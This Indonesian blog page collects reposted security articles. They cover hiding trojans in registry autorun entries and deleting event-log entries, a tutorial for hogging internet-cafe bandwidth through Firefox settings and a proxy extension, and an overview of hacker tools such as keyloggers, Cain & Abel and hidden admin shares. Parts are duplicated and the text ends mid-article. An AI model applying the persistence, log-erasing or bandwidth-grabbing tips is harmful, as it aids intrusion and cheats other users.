Menyiapkan backdoor
Hacker biasanya ingin mengamankan akses ke PC korbannya untuk 'kunjungan' berikutnya. Untuk keperluan itu, biasanya hacker menginstalasikan sebuah trojan yang menjamin serangan mendatang lebih mudah dilakukan. Salah satu caranya adalah dengan mengubah sebuah file sistem. Namun, cara ini memiliki kelemahan. Virus scanner biasanya langsung dapat menciumnya.
Cara yang jauh lebih prospektif adalah menempatkan trojan pada PC sebagai sebuah file terpisah dan menjalankannya bersama sistem melalui salah satu dari banyak kemungkinan autoexec. Titik yang paling dikenal adalah kelompok program 'Startup'. Namun, kehadiran sebuah entri di sana akan langsung terlihat oleh pengguna. Windows-registry adalah celah yang lebih tepat. Di sini, tercantum sangat banyak entri autoexec, sehingga tidak akan kentara jika hanya ditambah sebuah.
Cara melindungi diri: Sebuah freeware untuk administrator bernama Autoruns dari Sysinternals (www.sysinternals.com) dapat menampilkan semua entri autoexec dalam registry. Tool ini juga memberi informasi tambahan seperti file-signature dan yang lainnya. Dengan demikian, administrator dapat memeriksa validitas semua signature dan menghapus atau mematikan entri-entri yang tidak dinginkan.
Jika Autoruns menemukan sebuah program yang tidak dikenalinya, ia akan menawarkan layanan pencari Google. Dengan mengklik nama programnya, secara otomatis tool akan menjalankan browser dan menghubungi Google dengan kata kunci yang tepat.
Menghapus jejak
Apa strategi Jack Bauer untuk bertahan hidup? Ia selalu berusaha untuk tidak dikenali. Itu yang juga dilakukan hacker. Sedapat mungkin pengguna PC tidak boleh tahu apa pun mengenai aktivitas yang dilakukan. Oleh karena itu, sebelum meninggalkan sistem, hacker yang teliti akan selalu menghapus file-file log dari PC.
Dalam lingkungan Windows, infomasi tersebut ditampung dalam EventLog. Di sini Windows menyimpan semua informasi mengenai upaya login, layanan atau program yang crash, dan lain-lain.
Peringatan: 'Event Viewer' Windows menunjukkan adanya ketidakteraturan dalam operasi PC Anda.
Sebenarnya hacker hanya perlu menghapus entri-entri yang terkait dengan aktivitasnya pada PC korban. Namun, 'Event Viewer' dari Microsoft hanya memungkinkan penghapusan seluruh file log. Menghapus seluruh file log memang akan menghapus jejak, tetapi akan menarik perhatian. Sebuah tool khusus buatan seorang hacker Rusia dapat menghapus entri-entri tertentu dari file log—tidak seluruh file.
Selanjutnya, apa yang harus dilakukan? Dari uraian di atas, CHIP menyarankan untuk tidak lagi membuang-buang waktu. Instalasikan segera update dan patch terbaru untuk sistem operasi dan aplikasi yang Anda gunakan saat ini. Memang hal ini tidak membuat PC Anda 100% aman, tetapi setidaknya dapat menangkal sebagian besar serangan hacker.
Link
www.securitfocus.com: Website yang berisi berita-berita keamanan penting.www.packetstormsecurity.com: Website hacker dengan banyak tool dan informasi.
http://research.microsoft.com: Berisi hasil-hasil penelitian Microsoft, termasuk yang berhubungan dengan keamanan.
www.rootkit.com: Di sini tersedia semua informasi seputar Rootkits for Windows.
Selasa, 25 Maret 2008
"curi bandwith melalui mozila" [bukan tanggung jawab saya bila terjadi sesuatu dengan anda]
- TUTORIAL -
* Monopoli bandwith dengan mozilla
Pernah gak temen2 ngerasain pas lagi warnet yang walaupun sepi user tapi buat browsing ttp pelan, download juga pelan bgt... itu karena tiap bilik/room udah di batasi bitrate n bandwithnya... nah sekarang masalah itu mungkin bisa teratasi dengan cara ini:
1). Buka Browser Mozilla Firefox
2). Pada Address Bar Ketik : ABOUT:CONFIG
3). Cari string di bawah ini : ( pastikan semua srting dibawah "TRUE")
contoh menggantingnya :
NETWORK.HTTP.PIPELINING FALSE ==> klik kanan dan pilih "Toggle"
NETWORK.HTTP.PIPELINING TRUE
NETWORK.HTTP.PIPELINING.MAXREQUESTS 64
NETWORK.HTTP.PROXY.PIPELINING TRUE
NETWORK.PROXY.SHARE_PROXY_SETTINGS FALSE <=== ini harus False
4). buat srting baru caranya : Klik Kiri 1X Dimana Saja, Klik Kanan NEW>>INTEGER
5). Ketik : NGLAYOUT.INITIALPAINT.DELAY Beri Nilai 0
6). Kemudian REFRESH atau Tekan F5
7). Pada Address Bar Ketik : ABOUT:BLANK
Klik Menu:
Untuk OS Windows XP TOOLS>>OPTIONS>>WEB FEATURES
Untuk OS Linux ( Vector ) EDIT >> PREFERENCES
Untuk Setting yang berbeda di beberapa OS EDIT >>ADVANCED
9). Pada Option :
ALLOW WEB SITES TO INSTALL SOFTWARE Beri Tanda Check Box Untuk mengaktifkan
10).Kemudian Tekan OK Lalu REFRESH ( F5 )
11).Masuk Ke Link Ini :
https://addons.mozilla.org/extensions/moreinfo.php?applicationfiltered=firefox&id=125
atau :
https://addons.mozilla.org/extensions/moreinfo.php?id=125&applicationfiltered=firefox
12).Download Software SwitchProxy Tool Versi 1.3.4
13).Setelah Selesai Jangan Tekan Tombol UPDATE
14).Klik Tanda X (tutup)Yang Ada Di Pojok Kanan Atas Dari POP UP Window Yang Muncul
15).Tutup Semua Browser Mozilla FireFox,
16).Kemudian Buka Lagi Untuk Mengaktifkan Software SwitchProxy Tool Versi 1.3.4 Yang sudah di Install Tadi
17).Kalo Instalasi Sukses, Akan Muncul Toolbar tambahan Di Bawah Toolbar Navigasi & Address Bar.
Sekarang Browser Mozilla Siap Untuk Digunakan…….
:: Message ::
-- Software SwitchProxy Tool Versi 1.3.4 Ini selain untuk Mengganti Proxy Secara Otomatis Di Browser Mozilla FireFox, Engine-nya Juga Berpengaruh terhadap Kecepatan Koneksi Internet
-- Cara Ini Sangat Efektif Bila Digunakan Di Warnet Yang Padat Pengunjung untuk Menyedot Bandwidth ( Mayoritas kecepatan akses Internet ) Ke Komputer Yang Sedang Anda Pakai
-- Perubahan Yang Signifikan Terjadi Pada koneksi Internet Dengan BROADBAND / VSAT
Cara diatas sudah saya coba dan berhasil pada warnet tertentu but klo pada warnet yang mempunyai manajemen bandwidth yang bagus gw masih pake IDMAN (Internet Download Manager)
* Monopoli bandwith dengan mozilla
Pernah gak temen2 ngerasain pas lagi warnet yang walaupun sepi user tapi buat browsing ttp pelan, download juga pelan bgt... itu karena tiap bilik/room udah di batasi bitrate n bandwithnya... nah sekarang masalah itu mungkin bisa teratasi dengan cara ini:
1). Buka Browser Mozilla Firefox
2). Pada Address Bar Ketik : ABOUT:CONFIG
3). Cari string di bawah ini : ( pastikan semua srting dibawah "TRUE")
contoh menggantingnya :
NETWORK.HTTP.PIPELINING FALSE ==> klik kanan dan pilih "Toggle"
NETWORK.HTTP.PIPELINING TRUE
NETWORK.HTTP.PIPELINING.MAXREQUESTS 64
NETWORK.HTTP.PROXY.PIPELINING TRUE
NETWORK.PROXY.SHARE_PROXY_SETTINGS FALSE <=== ini harus False
4). buat srting baru caranya : Klik Kiri 1X Dimana Saja, Klik Kanan NEW>>INTEGER
5). Ketik : NGLAYOUT.INITIALPAINT.DELAY Beri Nilai 0
6). Kemudian REFRESH atau Tekan F5
7). Pada Address Bar Ketik : ABOUT:BLANK
Klik Menu:
Untuk OS Windows XP TOOLS>>OPTIONS>>WEB FEATURES
Untuk OS Linux ( Vector ) EDIT >> PREFERENCES
Untuk Setting yang berbeda di beberapa OS EDIT >>ADVANCED
9). Pada Option :
ALLOW WEB SITES TO INSTALL SOFTWARE Beri Tanda Check Box Untuk mengaktifkan
10).Kemudian Tekan OK Lalu REFRESH ( F5 )
11).Masuk Ke Link Ini :
https://addons.mozilla.org/extensions/moreinfo.php?applicationfiltered=firefox&id=125
atau :
https://addons.mozilla.org/extensions/moreinfo.php?id=125&applicationfiltered=firefox
12).Download Software SwitchProxy Tool Versi 1.3.4
13).Setelah Selesai Jangan Tekan Tombol UPDATE
14).Klik Tanda X (tutup)Yang Ada Di Pojok Kanan Atas Dari POP UP Window Yang Muncul
15).Tutup Semua Browser Mozilla FireFox,
16).Kemudian Buka Lagi Untuk Mengaktifkan Software SwitchProxy Tool Versi 1.3.4 Yang sudah di Install Tadi
17).Kalo Instalasi Sukses, Akan Muncul Toolbar tambahan Di Bawah Toolbar Navigasi & Address Bar.
Sekarang Browser Mozilla Siap Untuk Digunakan…….
:: Message ::
-- Software SwitchProxy Tool Versi 1.3.4 Ini selain untuk Mengganti Proxy Secara Otomatis Di Browser Mozilla FireFox, Engine-nya Juga Berpengaruh terhadap Kecepatan Koneksi Internet
-- Cara Ini Sangat Efektif Bila Digunakan Di Warnet Yang Padat Pengunjung untuk Menyedot Bandwidth ( Mayoritas kecepatan akses Internet ) Ke Komputer Yang Sedang Anda Pakai
-- Perubahan Yang Signifikan Terjadi Pada koneksi Internet Dengan BROADBAND / VSAT
Cara diatas sudah saya coba dan berhasil pada warnet tertentu but klo pada warnet yang mempunyai manajemen bandwidth yang bagus gw masih pake IDMAN (Internet Download Manager)
"Tools hacker"
" don't think negative by hacker "
!# Bonny citari sandy #!
Selamat bertemu kembali pada topik yang selalu hangat sejak Anda menyerahkan tanggung jawab data penting Anda pada sebuah mesin bernama komputer, yaitu topik mengenai hacker. Kali ini kita akan melihat tools atau senjata yang umum digunakan oleh seorang hacker. Tentu saja bukan untuk mengajarkan Anda menjadi seorang hacker atau tepatnya black hat hacker yang berkonotasi negatif. Mengetahui tools yang sering digunakan hacker, akan menambah wawasan dan pengetahuan mengenai keamanan sistem komputer. Mungkin hacker tidak akan popular jika sampai saat ini Anda masih cukup konvensional seperti menyimpan barang-barang berharga di bawah bantal, atau menguburnya dalam-dalam di bawah tanah juga tidak pernah mengenal komputer maupun Internet. Sayangnya, Anda tidak dapat menghindari komputer dan Internet saat semua tetangga Anda menggunakan Internet banking, kolega Anda selalu berkomunikasi melalui e-mail, warung kopi favorit Anda mempromosikan layanan hotspot, ditambah lagi penjual majalah sebelah rumah selalu menawarkan Anda majalah PC Media. Mau tidak mau, Anda harus membeli komputer dan mengakses Internet! Setelah terkagum-kagum bagaimana komputer dapat menyimpan data Anda, komunikasi menjadi lebih mudah, bahkan mungkin Anda dapat menemukan teman kencan dalam waktu singkat, maka perlahan tapi pasti Anda mulai menggilai Internet dan membuat Anda setengah gila jika tidak mengaskes Internet satu hari saja. Hingga suatu hari, Anda membaca sebuah artikel di PC Media mengenai hacking ditambah dengan bumbu-bumbu seram oleh penulisnya, maka kegembiraan Anda berubah menjadi kecurigaan dan paranoid Anda mulai memeriksa header e-mail pada setiap e-mail yang Anda terima, melakukan pergantian password secara rutin setiap 3 jam sekali, dan pertanyaan pertama pada lawan chatting Anda adalah “kamu benarbenar cewek, kan?”. Untuk mencegah lebih banyak korban paranoid di dunia Internet, Anda perlu mengenal dunia mereka, minimal senjatasenjata yang umum digunakan oleh hacker. Hal ini jauh lebih bermanfaat dibandingkan sikap paranoid yang tidak pernah membuat Anda tenang.
Motivasi
Mungkin Anda telah mengetahui bahwa pengertian hacker sebenarnya tidak selalu berkonotasi negatif.
Hacker dalam pengertian yang positif dikenal dengan white hat hacker, sedangkan hacker dalam pengertian yang negatif dikenal dengan black hat hacker. Tetapi, sebagian besar orang terlanjur menilai hacker dalam pengertian yang negatif. Skill maupun tools yang digunakan white hat hacker dan black hat hacker bisa jadi sama, yang membedakan positif atau negatif adalah motivasi untuk melakukan tindakan hacking, serta apa yang dihasilkan dari tindakan itu. Berbagai macam motivasi dapat timbul dari dalam diri seorang hacker. Karena tujuan kita mempelajari tools hacker adalah untuk membangun keamanan sistem dan mengasah pengetahuan, maka yang perlu diwaspadai adalah motivasi dari black hat hacker. Seorang black hat hacker dapat melakukan tindakan hacking karena motivasi ingin mendapatkan uang dan keuntungan, hal yang cukup umum terjadi. Tetapi ada juga hacker yang memiliki motivasi untuk mendapatkan perhatian dan ketenaran, permasalahan dan isu politik, atau hanya karena rasa penasaran dan ingin tahu. Apapun motivasi tersebut jelaslah bahwa motivasi tersebut tidak selalu UUD (ujungujungnya duit), sehingga tidak benar jika hanya orang yang melakukan transaksi atau bisnis melalui Internet saja yang dapat terancam oleh tindakan hacker. Bahkan sebenarnya, siapapun dan di manapun Anda, selama terkoneksi didalam sebuah jaringan komputer LAN maupun Internet, maka selalu ada ancaman dari luar. Akan tetapi, tentunya juga tidak menjamin jika komputer yang tidak terkoneksi dengan jaringan atau Internet bisa 100% aman. Penyusupan masih bisa terjadi, tetapi dengan kondisi sang hacker tidak melakukannya secara remote, tetapi secara fisik dapat mengakses komputer Anda. Untuk menghindari Anda menjadi paranoid dengan tetangga yang kebetulan mampir atau keponakan Anda yang masih bayi, maka kita tidak membahas proses hacking secara fi sik, asumsi proses hacking dan tools yang dibahas di sini adalah secara remote melalui jaringan komputer.
Environment Linux
Jika artikel ini mengetengahkan tools yang digunakan hacker, maka mungkin Anda berpikir untuk menjadi seorang hacker cukup hanya dengan menggunakan semua tools tersebut. Sehingga mungkin Anda menganggap hacker adalah orang yang paling suka membaca manual penggunaan suatu software/tools. Anggapan ini keliru karena ada poin penting yang membedakan antara hacker dan orang yang hanya menggunakan tools hacking. Hacker memiliki skill dan dasar pengetahuan yang kuat. Sementara orang yang hanya menggunakan tools sering disebut dengan script kiddie. Salah satu bekal seorang hacker adalah skill dalam environment Linux, perintahperintah dasar Linux wajib dikuasai. Sebagai perbandingan perintah Linux dan perintah DOS/Command Prompt Windows dapat dilihat pada tabel1.
Telnet
Salah satu senjata hacker yang sederhana tetapi powerful adalah telnet. Dengan menggunakan telnet, Anda dapat mengakses sebuah host dan melakukan aktivitas didalamnya, di manapun Anda berada. Telnet umumnya telah tersedia build-in pada operating system keluarga Unix/Linux maupun Windows dan menggunakan default port 23 untuk melakukan koneksi. Anda dapat melakukan koneksi melalui port yang lain dengan menuliskan nomor port yang diinginkan, misalnya port 25 untuk SMTP atau port 80 untuk HTTP. Umumnya hacker menggunakan telnet untuk mengakses router atau server. Tentu saja router dan server yang diakses akan meminta otorisasi, karena itu jangan menggunakan password default atau password yang mudah ditebak. Kemampuan telnet memungkinkan Anda untuk mengirimkan e-mail, menciptakan shell account, melihat atau melakukan modifi kasi website, dan lain sebagainya. Perintah- perintah dalam telnet menggunakan perintah UNIX. Sebagaimana seseorang yang ingin menyusup ke sebuah rumah, penyusup tersebut hanya bisa masuk jika terdapat pintu atau jendela. Dalam sistem komputer, pintu, dan jendela tersebut adalah port. Sebuah komputer tanpa ada port yang terbuka ibaratnya adalah sebuah rumah tanpa pintu dan jendela. Dengan telnet, seseorang dapat menguji apakah port dengan nomor tertentu dalam keadaan open, hanya dengan mengetikkan telnet namaserver nomor_port. Contohnya jika Anda mengetikkan telnet domaintarget.com 25, perhatikan respon yang tampil, jika telnet hanya menampilkan pesan koneksi gagal, maka port 25 tidak tersedia untuk diakses secara remote.
Search Engine
Jika Anda memiliki website yang tiba-tiba di-hack oleh seseorang, jangan langsung menuduh pelakunya adalah pemilik warung kopi dimana Anda sering berhutang, siapapun berkesempatan menemukan website Anda melalui Internet search engine seperti Google, Yahoo!, Altavista, dan lain sebagainya. Khususnya yang cukup banyak mendapat sorotan adalah Google, bahkan kombinasi perintah yang disediakan Google telah menciptakan istilah Google Hacking karena kemampuannya menampilkan informasiinformasi yang mendukung proses hacking tersebut. Salah satu contoh sederhana, ketikkan perintah inurl:login.asp pada google. com, maka dalam sekejap akan ditampilkan jutaan halaman yang mengandung login.asp pada URLnya. Lalu dimana bahayanya? Login.asp adalah penamaan file yang umum untuk melakukan login pada website dengan bahasa ASP (Active Server Pages), dengan menemukan URL tersebut, ibaratnya seseorang telah menemukan pintu masuk untuk memperoleh akses yang lebih tinggi pada website Anda. Dengan mencoba teknik seperti SQL Injection, mencoba username dan password yang umum, brute force, dan bermacam teknik lainnya, maka jangan heran jika Anda memiliki statistik kunjungan halaman web Anda, kemudian mendapatkan halaman yang paling sering diakses adalah login. asp! Tentunya Anda perlu berhati-hati jika mendapatkan hal seperti ini.
Web Tools
Seseorang yang bermaksud buruk tidak ingin identitasnya diketahui, dan mungkin menggunakan proxy luar agar jejaknya sukar dilacak. Cara lainnya mungkin ia akan menuju sebuah warnet dan menjalankan aksinya. Kalau membayangkan seorang hacker sedang berjalan menuju warnet, mungkin Anda membayangkan hacker tersebut telah menyimpan berbagai tools supercanggih didalam fl ash disk yang akan dijalankannya pada komputer warnet. Tetapi ternyata tidak selalu harus demikian, jika semua yang dibutuhkan hacker tersebut telah tersedia di Internet. Beberapa website telah hadir sebagai tools untuk menjalankan aksi yang diinginkan hacker, contohnya adalah http://netcraft.com yang dapat melaporkan informasi sebuah domain, IP Address, DNS, dan lain sebagainya. Contoh website lainnya adalah http://centralops. net, yang menyediakan utilitas yang bervariasi, misalnya tools untuk melakukan investigasi e-mail address, investigasi domain sehingga menghasilkan informasi WhoIs, trace route, hingga service scan. Untuk apa semua informasi tersebut bagi hacker? Ternyata bisa jadi informasi tersebut adalah informasi vital untuk hacker, dan dapat berakibat fatal bagi korban. Misalnya informasi mengenai contact person, dapat digunakan untuk melakukan social engineering, informasi mengenai web server, dapat digunakan untuk menemukan vulnerability web server tersebut, bahkan informasi mengenai nomor telpon, dapat digunakan untuk target serangan salah satu teknik hacking yang disebut war dial.
Cain & Abel
Cain & Abel merupakan suatu aplikasi desktop berbasis Windows, memiliki tujuan utama untuk recovery password dengan berbagai metode, seperti packet sniffing, dictionary attack, brute attack, ataupun cryptanalysis. Attack Walaupun diklaim oleh pembuatnya bahwa Cain & Abel tidak mengandung malware, tetapi beberapa anti virus mendeteksi Cain & Abel sebagai malware bernama Win32: Cain-B [Tool]. Kemampuan lain dari Cain & Abel adalah mampu melihat password di belakang karakter asterisk, VoIP Filtering, dan masih banyak lagi yang membuat Cain & Abel merupakan salah satu tools terlengkap yang dapat Anda peroleh secara gratis saat ini.
KeyLogger
Bayangkan jika setiap penekanan tombol keyboard yang Anda lakukan terekam dengan diam-diam untuk kemudian dilihat oleh seseorang, tentu hal yang menjengkelkan, bukan? Hal inilah yang dilakukan tools dalam kategori keylogger. Cukup banyak software kategori keylogger yang dapat Anda dapatkan di Internet dengan nama-nama yang aneh dan seram. Bayangkan apa akibat yang dapat terjadi jika sebuah software keylogger beraksi, mungkin Anda tanpa sengaja telah menyerahkan nomor kartu kredit, password e-mail, surat cinta, curhat, dan apapun yang telah Anda ketikkan pada keyboard Pada umumnya program keylogger akan bersembunyi pada background sehingga tidak mudah dideteksi keberadaannya setiap penekanan tombol keyboard direkam dalam sebuah fi le ataupun dikirimkan pada pemasang program. Jika komputer yang digunakan bukan komputer Anda, tentu mudah untuk memasang program keylogger. Tetapi tidak berarti komputer pribadi Anda yang terkunci dalam kamar aman dari keylogger, keylogger masih dapat terinstal pada background melalui berbagai jenis malware atau rootkit, atau jika seseorang dapat menguasai komputer Anda secara remote. Jika Anda cukup paranoid, kebetulan berada di warnet dan menganggap komputer yang sedang digunakan terdapat keylogger, maka Anda dapat berkreasi (atau kurang kerjaan) mengakali keylogger dengan mengetikkan huruf a sampai z pada notepad, kemudian menggunakan mouse untuk menyorot huruf dan melakukan copy paste huruf demi huruf yang ingin Anda tulis. Apakah tidak ada cara yang lebih terhormat selain cara aneh di atas yang membuat Anda menjadi pusat perhatian seluruh pengunjung warnet? Untungnya ada, yaitu Anda dapat menggunakan virtual keyboard (On-Screen Keyboard) yang disediakan Windows dan terletak pada menu Start – All Programs – Accessories – Accessibility – On Screen Keyboard. Apakah permasalahan telah selesai? Ternyata belum, karena ternyata pembuat software semakin berkembang dan tidak saja dapat merekam penekanan tombol, tetapi bisa jadi juga mengambil capture layer secara diam-diam. Sebagai solusinya, terdapat software antikeylogger yang umumnya melakukan block atau mendeteksi aktivitas keylogger, juga melakukan block terhadap screen capture.
Retina
Retina merupakan tools untuk melakukan scan terhadap vulnerability sebuah system komputer, informasi vulnerability yang ditampilkan Retina tergolong cukup lengkap, bahkan pada beberapa bagian Retina juga menyediakan solusinya. Anda dapat menjalankan Retina untuk melakukan scan pada sebuah domain Internet ataupun komputer pada LAN. Contoh vulnerability yang sering ditemui pada jaringan LAN adalah saat sebuah komputer membiarkan account Administrator dapat diakses tanpa password, atau menggunakan password standard. Kelemahan lainnya yang dapat ditemukan dengan mudah oleh Retina adalah membiarkan default-hidden share drive pada komputer Anda. Tahukah Anda bahwa sistem operasi Windows XP dan family-nya secara otomatis menciptakan drive share yang tersembunyi untuk masing-masing drive yang tersedia? Artinya, jika Anda memiliki drive C dan D, maka kedua drive tersebut sebenarnya di share tanpa terlihat, kecuali saat Anda menyertakan karakter $ di depan huruf drive. Jadi seseorang di dalam jaringan LAN dapat saja mengakses drive C Anda dengan mengetikkan \\nama_computer_anda\C$, memasukkan username dan password yang valid (bayangkan jika Anda membiarkan account Administrator tanpa password), dan terbukalah seluruh drive C Anda, tanpa Anda secara sengaja melakukan share terhadap drive C. Tidak hanya drive C$, D$, atau E$ yang di share secara tersembunyi, tetapi juga ADMIN$, FAX$, IPC$, NetLogon, dan PRINT$. Ini adalah vulnerability fatal yang tidak disadari oleh banyak pengguna komputer dengan sistem operasi Windows. Untuk itu, Anda harus memastikan setiap account yang dapat mengakses komputer Anda memiliki password yang tidak mudah ditebak. Solusi lainnya Anda dapat menghapus hidden-share tersebut agar share tersebut hilang secara permanen, Anda perlu mengubah nilai registry. Untuk komputer server yang menggunakan Windows NT 4.0/W2K, Windows Server 2003, perubahan registry adalah sebagai berikut:
Hive: HKEY_LOCAL_MACHINE
Key: SYSTEM\CurrentControlSet\ Services\LanManServer\Parameters
Name: AutoShareServer
Data Type: REG_DWORD
Value: 0
Jika tidak terdapat name AutoShareServer, Anda dapat menciptakan item DWORD value yang baru dari program registry seperti RegEdit. Sedangkan, untuk komputer workstation yang menggunakan Windows NT 4.0 Workstation/ W2K Pro/XP Pro, perubahan registry adalah sebagai berikut:
Hive: HKEY_LOCAL_MACHINE
Key: SYSTEM\CurrentControlSet\ Services\LanManServer\Parameters
Name: AutoShareWks
Data Type: REG_DWORD
Value: 0
Jika tidak terdapat name AutoShareWks, Anda dapat menciptakan item DWORD value yang baru dari program registry seperti RegEdit. Restart komputer Anda agar perubahan pada registry terupdate pada sistem Anda, jika pada suatu saat Anda ingin mengembalikan pada keadaan default, ubah nilai value pada registry menjadi 1. Masih banyak lagi informasi vulnerability yang mampu ditampilkan oleh Retina bagaikan seorang dokter yang memeriksa kesehatan pasiennya, terkadang sang pasien dapat terheran-heran bahwa dirinya ternyata tidak sesehat (baca: tidak seaman) yang dikira.
Senjata Utama
Tentunya tidak mungkin membahas secara komplit seluruh tools yang tersedia, tetapi seorang hacker memiliki satu “tools” atau senjata utama yang unik. Tools yang paling sulit sekaligus senjata utama hacker adalah kreativitas. Tentunya kreativitas harus didukung oleh pengetahuan dan wawasan agar selalu berkembang, sering kali vulnerability atau kelemahan baru pada sistem ditemukan karena kreativitas dan kegigihan hacker yang mampu memanfaatkan kesalahan pemrograman atau bugs sistem tersebut. Contohnya adalah teknik SQL Injection, yang memanfaatkan kesalahan pemrograman yang tidak melakukan validasi terhadap input, sehingga input dapat dimanipulasi agar database melaksanakan instruksi yang dikehendari hacker. Anda dapat membayangkan betapa kreatif dan luas pengetahuan sang penemu SQL Injection yang kali pertama. Sebuah serangan yang kreatif dapat muncul dari mana saja tanpa disadari oleh korban, dan terkadang serangan tersebut tidak menggunakan tools ataupun skill yang canggih. Sebagai contoh kasus yang mungkin dapat Anda temui sehari-hari, sebuah perusahaan menutup akses browsing dengan alas an keamanan, dan terhindar dari situs-situs yang mengandung trojan, worm, virus, dan ancaman lain yang dapat berasal dari penggunaan browser. Tetapi karena perusahaan memerlukan sarana komunikasi yang praktis maka akses untuk e-mail diijinkan, termasuk menerima e-mail dalam format HTML. Di sinilah sebuah serangan dapat terjadi tanpa melalui browser, hanya memanfaatkan e-mail yang dapat menerima format HTML. Seperti Anda ketahui, HTML dapat mengandung (embedded) object-object ataupun JavaScript yang dieksekusi pada computer client. Misalnya seorang hacker ingin mengetahui IP Anda, ia dapat meng-upload gambar pada sebuah server, membuat HTML yang memanggil gambar tersebut dan mengirimkan e-mail HTML tersebut kepada Anda. Saat Anda menerimanya, e-mail client Anda akan men-download gambar tersebut dari server hacker, sang hacker cukup melihat pada log server-nya dan mendapatkan IP Anda! Jika antivirus dianggap selalu ketinggalan satu langkah dengan virus, maka seharusnya tidak demikian dengan dunia hacking. Jangan biarkan Anda diserang dulu baru kemudian mempertahankan diri. Sudah terlambat. Berpikir dengan cara pikir lawan, dapat membantu Anda menemukan kelemahan sistem Anda sendiri dan menemukan solusi untuk mengatasi serangan yang telah Anda prediksikan.
Penutup
Saat Anda telah mengetahui bahwa terdapat sedemikian banyak tools yang dapat merugikan orang lain, mungkin Anda berpikir untuk mengadakan demo pemberantasan tools tersebut dan menyeret pembuatnya ke meja hijau. Sayangnya, hal tersebut bukanlah cara yang tepat untuk melindungi sistem keamanan jaringan dan komputer Anda. Tidak semua tools yang digunakan hacker dibuat untuk tujuan yang merugikan, tools tersebut juga berguna untuk network administrator, white hat hacker, konsultan keamanan, pengajar, dan lain-lain. Semuanya tergantung pada alasan dan motivasi untuk menggunakan tools tersebut, apakah ada alasan etik ataukah memang bermaksud merugikan orang lain. Sebuah tools menjadi bermanfaat atau merugikan, tergantung dari pemakai tools tersebut. Hal yang sama juga berlaku untuk tools seperti keylogger, bukankah keylogger akan menjadi tools yang bermanfaat jika digunakan untuk memonitor aktivitas anak dalam menggunakan komputer, atau bisa juga digunakan sebagai backup pekerjaan, bukan? Sebaliknya, tools standar pada system operasi yang sudah jelas diciptakan agar bermanfaat bagi pengguna, juga dapat disalahgunakan. Misalnya perintah format, akan menjadi tools yang seram jika digunakan oleh orang lain untuk memformat drive yang berisi seluruh data penting Anda. Pada akhirnya, kombinasi dari pengetahuan dan kode etik juga lah yang akan membawa kita menggunakan tools apapun dengan baik!?
_ http://www.skullbox.net/telnethack. php
_ http://en.wikipedia.org/wiki/ Vulnerability_%28computing%29
_ http://support.microsoft.com/ kb/314984
!# Bonny citari sandy #!
Selamat bertemu kembali pada topik yang selalu hangat sejak Anda menyerahkan tanggung jawab data penting Anda pada sebuah mesin bernama komputer, yaitu topik mengenai hacker. Kali ini kita akan melihat tools atau senjata yang umum digunakan oleh seorang hacker. Tentu saja bukan untuk mengajarkan Anda menjadi seorang hacker atau tepatnya black hat hacker yang berkonotasi negatif. Mengetahui tools yang sering digunakan hacker, akan menambah wawasan dan pengetahuan mengenai keamanan sistem komputer. Mungkin hacker tidak akan popular jika sampai saat ini Anda masih cukup konvensional seperti menyimpan barang-barang berharga di bawah bantal, atau menguburnya dalam-dalam di bawah tanah juga tidak pernah mengenal komputer maupun Internet. Sayangnya, Anda tidak dapat menghindari komputer dan Internet saat semua tetangga Anda menggunakan Internet banking, kolega Anda selalu berkomunikasi melalui e-mail, warung kopi favorit Anda mempromosikan layanan hotspot, ditambah lagi penjual majalah sebelah rumah selalu menawarkan Anda majalah PC Media. Mau tidak mau, Anda harus membeli komputer dan mengakses Internet! Setelah terkagum-kagum bagaimana komputer dapat menyimpan data Anda, komunikasi menjadi lebih mudah, bahkan mungkin Anda dapat menemukan teman kencan dalam waktu singkat, maka perlahan tapi pasti Anda mulai menggilai Internet dan membuat Anda setengah gila jika tidak mengaskes Internet satu hari saja. Hingga suatu hari, Anda membaca sebuah artikel di PC Media mengenai hacking ditambah dengan bumbu-bumbu seram oleh penulisnya, maka kegembiraan Anda berubah menjadi kecurigaan dan paranoid Anda mulai memeriksa header e-mail pada setiap e-mail yang Anda terima, melakukan pergantian password secara rutin setiap 3 jam sekali, dan pertanyaan pertama pada lawan chatting Anda adalah “kamu benarbenar cewek, kan?”. Untuk mencegah lebih banyak korban paranoid di dunia Internet, Anda perlu mengenal dunia mereka, minimal senjatasenjata yang umum digunakan oleh hacker. Hal ini jauh lebih bermanfaat dibandingkan sikap paranoid yang tidak pernah membuat Anda tenang.
Motivasi
Mungkin Anda telah mengetahui bahwa pengertian hacker sebenarnya tidak selalu berkonotasi negatif.
Hacker dalam pengertian yang positif dikenal dengan white hat hacker, sedangkan hacker dalam pengertian yang negatif dikenal dengan black hat hacker. Tetapi, sebagian besar orang terlanjur menilai hacker dalam pengertian yang negatif. Skill maupun tools yang digunakan white hat hacker dan black hat hacker bisa jadi sama, yang membedakan positif atau negatif adalah motivasi untuk melakukan tindakan hacking, serta apa yang dihasilkan dari tindakan itu. Berbagai macam motivasi dapat timbul dari dalam diri seorang hacker. Karena tujuan kita mempelajari tools hacker adalah untuk membangun keamanan sistem dan mengasah pengetahuan, maka yang perlu diwaspadai adalah motivasi dari black hat hacker. Seorang black hat hacker dapat melakukan tindakan hacking karena motivasi ingin mendapatkan uang dan keuntungan, hal yang cukup umum terjadi. Tetapi ada juga hacker yang memiliki motivasi untuk mendapatkan perhatian dan ketenaran, permasalahan dan isu politik, atau hanya karena rasa penasaran dan ingin tahu. Apapun motivasi tersebut jelaslah bahwa motivasi tersebut tidak selalu UUD (ujungujungnya duit), sehingga tidak benar jika hanya orang yang melakukan transaksi atau bisnis melalui Internet saja yang dapat terancam oleh tindakan hacker. Bahkan sebenarnya, siapapun dan di manapun Anda, selama terkoneksi didalam sebuah jaringan komputer LAN maupun Internet, maka selalu ada ancaman dari luar. Akan tetapi, tentunya juga tidak menjamin jika komputer yang tidak terkoneksi dengan jaringan atau Internet bisa 100% aman. Penyusupan masih bisa terjadi, tetapi dengan kondisi sang hacker tidak melakukannya secara remote, tetapi secara fisik dapat mengakses komputer Anda. Untuk menghindari Anda menjadi paranoid dengan tetangga yang kebetulan mampir atau keponakan Anda yang masih bayi, maka kita tidak membahas proses hacking secara fi sik, asumsi proses hacking dan tools yang dibahas di sini adalah secara remote melalui jaringan komputer.
Environment Linux
